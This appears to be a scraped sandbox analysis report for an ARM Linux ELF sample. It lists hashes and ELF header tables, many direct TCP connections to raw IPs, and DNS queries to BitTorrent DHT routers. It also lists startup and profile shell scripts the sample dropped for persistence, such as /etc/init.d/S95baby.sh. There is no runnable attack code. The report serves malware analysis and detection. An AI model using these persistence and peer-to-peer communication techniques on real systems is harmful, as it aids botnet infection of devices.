Source: unknown	TCP traffic detected without corresponding DNS query: 73.28.144.173
Source: unknown	TCP traffic detected without corresponding DNS query: 113.94.133.170
Source: unknown	TCP traffic detected without corresponding DNS query: 119.215.99.156
Source: unknown	TCP traffic detected without corresponding DNS query: 90.232.155.185
Source: unknown	TCP traffic detected without corresponding DNS query: 111.78.196.116
Source: unknown	TCP traffic detected without corresponding DNS query: 26.11.196.70
Source: unknown	TCP traffic detected without corresponding DNS query: 58.189.121.169
Source: unknown	TCP traffic detected without corresponding DNS query: 106.152.251.50
Source: unknown	TCP traffic detected without corresponding DNS query: 35.200.178.13
Source: unknown	TCP traffic detected without corresponding DNS query: 137.40.92.251
Source: unknown	TCP traffic detected without corresponding DNS query: 18.82.236.106
Source: unknown	TCP traffic detected without corresponding DNS query: 155.189.226.125
Source: unknown	TCP traffic detected without corresponding DNS query: 32.54.226.30
Source: unknown	TCP traffic detected without corresponding DNS query: 175.88.224.26
Source: unknown	TCP traffic detected without corresponding DNS query: 7.29.11.132
Source: unknown	TCP traffic detected without corresponding DNS query: 131.62.122.210
Source: unknown	TCP traffic detected without corresponding DNS query: 70.172.81.219
Source: unknown	TCP traffic detected without corresponding DNS query: 30.84.48.130
Source: unknown	TCP traffic detected without corresponding DNS query: 171.23.177.240
Source: unknown	TCP traffic detected without corresponding DNS query: 16.1.9.146
Source: unknown	TCP traffic detected without corresponding DNS query: 96.204.93.246
Source: unknown	TCP traffic detected without corresponding DNS query: 6.205.85.158
Source: unknown	TCP traffic detected without corresponding DNS query: 122.248.149.165
Source: unknown	TCP traffic detected without corresponding DNS query: 192.97.26.236
Source: unknown	TCP traffic detected without corresponding DNS query: 167.233.55.65
Source: unknown	TCP traffic detected without corresponding DNS query: 212.35.88.79
Source: unknown	TCP traffic detected without corresponding DNS query: 25.75.205.173
Source: unknown	TCP traffic detected without corresponding DNS query: 106.222.158.5
Source: unknown	TCP traffic detected without corresponding DNS query: 132.191.123.35
Source: unknown	TCP traffic detected without corresponding DNS query: 107.227.55.144
Source: unknown	TCP traffic detected without corresponding DNS query: 217.150.215.116
Source: unknown	TCP traffic detected without corresponding DNS query: 137.62.189.193
Source: unknown	TCP traffic detected without corresponding DNS query: 209.219.134.7
Source: unknown	TCP traffic detected without corresponding DNS query: 126.106.74.156
Source: unknown	TCP traffic detected without corresponding DNS query: 59.230.90.160
Source: unknown	TCP traffic detected without corresponding DNS query: 179.251.32.251
Source: unknown	TCP traffic detected without corresponding DNS query: 158.166.4.165
Source: unknown	TCP traffic detected without corresponding DNS query: 68.228.150.77
Source: unknown	TCP traffic detected without corresponding DNS query: 55.92.215.83
Source: unknown	TCP traffic detected without corresponding DNS query: 153.58.49.72
Source: unknown	TCP traffic detected without corresponding DNS query: 216.85.193.21
Source: unknown	TCP traffic detected without corresponding DNS query: 167.15.35.246
Source: unknown	TCP traffic detected without corresponding DNS query: 134.224.138.24
Source: unknown	TCP traffic detected without corresponding DNS query: 31.23.54.208
Source: unknown	TCP traffic detected without corresponding DNS query: 170.93.179.178
Source: unknown	TCP traffic detected without corresponding DNS query: 196.155.214.59

Source: global traffic	DNS traffic detected: DNS query: dht.transmissionbt.com
Source: global traffic	DNS traffic detected: DNS query: router.bittorrent.com
Source: global traffic	DNS traffic detected: DNS query: router.utorrent.com
Source: global traffic	DNS traffic detected: DNS query: bttracker.debian.org

Process:	/tmp/bin.sh.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.exit 1.

File type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.819759780885281
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	bin.sh.elf
File size:	307'960 bytes
MD5:	08b9c0cce72be9d0593fb14d67780bff
SHA1:	bba44d9dc631607564fbdd7483361099f5bb55e7
SHA256:	72b9f5286030ea745a84f0b10e7650e13ca9f77a8a6c1fb6f2e30c7acf04fa9f
SHA512:	daa27adf767deda522c9a55cb2c52fec7e97a61c8d1e48dfb3837c0836cf6ee84ce2b1093443f2325e543275f91a5248b79fdf19407c0917f81a895b81f13752
SSDEEP:	6144:T2s/gAWNboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW/UmJqBxAuaPRhVabEDSDP99zBT
TLSH:	BD643A8AFD81AE25D5C126BBFE2F4289331317B8D2EB71029D145F2876CA94F0F7A541
File Content Preview:	.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8194
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	307280
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	16

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0
.init	PROGBITS	0x80d4	0xd4	0x10	0x0	0x6	AX	0	4
.text	PROGBITS	0x80f0	0xf0	0x34a98	0x0	0x6	AX	0	16
.fini	PROGBITS	0x3cb88	0x34b88	0x10	0x0	0x6	AX	0	4
.rodata	PROGBITS	0x3cb98	0x34b98	0xb9d0	0x0	0x2	A	0	8
.ARM.extab	PROGBITS	0x48568	0x40568	0x18	0x0	0x2	A	0	4
.ARM.exidx	ARM_EXIDX	0x48580	0x40580	0x128	0x0	0x82	AL	2	4
.eh_frame	PROGBITS	0x51000	0x41000	0x4	0x0	0x3	WA	0	4
.tbss	NOBITS	0x51004	0x41004	0x8	0x0	0x403	WAT	0	4
.init_array	INIT_ARRAY	0x51004	0x41004	0x4	0x0	0x3	WA	0	4
.fini_array	FINI_ARRAY	0x51008	0x41008	0x4	0x0	0x3	WA	0	4
.data.rel.ro	PROGBITS	0x51010	0x41010	0x18	0x0	0x3	WA	0	4
.got	PROGBITS	0x51028	0x41028	0xb8	0x4	0x3	WA	0	4
.data	PROGBITS	0x510e0	0x410e0	0x9ec8	0x0	0x3	WA	0	8
.bss	NOBITS	0x5afa8	0x4afa8	0x25b90	0x0	0x3	WA	0	8
.ARM.attributes	ARM_ATTRIBUTES	0x0	0x4afa8	0x16	0x0	0x0		0	1
.shstrtab	STRTAB	0x0	0x4afbe	0x90	0x0	0x0		0	1

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
EXIDX	0x40580	0x48580	0x48580	0x128	0x128	4.6450	0x4	R	0x4	.ARM.exidx
LOAD	0x0	0x8000	0x8000	0x406a8	0x406a8	6.2027	0x5	R E	0x8000	.init .text .fini .rodata .ARM.extab .ARM.exidx
LOAD	0x41000	0x51000	0x51000	0x9fa8	0x2fb38	2.2244	0x6	RW	0x8000	.eh_frame .tbss .init_array .fini_array .data.rel.ro .got .data .bss
TLS	0x41004	0x51004	0x51004	0x0	0x8	0.0000	0x4	R	0x4	.tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report bin.sh.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/grub/i386-pc/modinfo.sh

/etc/acpi/asus-keyboard-backlight.sh

/etc/acpi/asus-wireless.sh

/etc/acpi/ibm-wireless.sh

/etc/acpi/tosh-wireless.sh

/etc/acpi/undock.sh

/etc/console-setup/cached_setup_font.sh

/etc/console-setup/cached_setup_keyboard.sh

/etc/console-setup/cached_setup_terminal.sh

/etc/gdm3/config-error-dialog.sh

/etc/init.d/S95baby.sh

/etc/init.d/console-setup.sh

/etc/init.d/hwclock.sh

/etc/init.d/keyboard-setup.sh

/etc/profile.d/01-locale-fix.sh

/etc/profile.d/Z97-byobu.sh

/etc/profile.d/Z99-cloud-locale-test.sh

/etc/profile.d/Z99-cloudinit-warnings.sh

/etc/profile.d/apps-bin-path.sh

/etc/profile.d/bash_completion.sh

/etc/profile.d/cedilla-portuguese.sh

/etc/profile.d/gawk.sh

/etc/profile.d/im-config_wayland.sh

/etc/profile.d/vte-2.91.sh

/etc/profile.d/xdg_dirs_desktop_session.sh

Linux Analysis Report
bin.sh.elf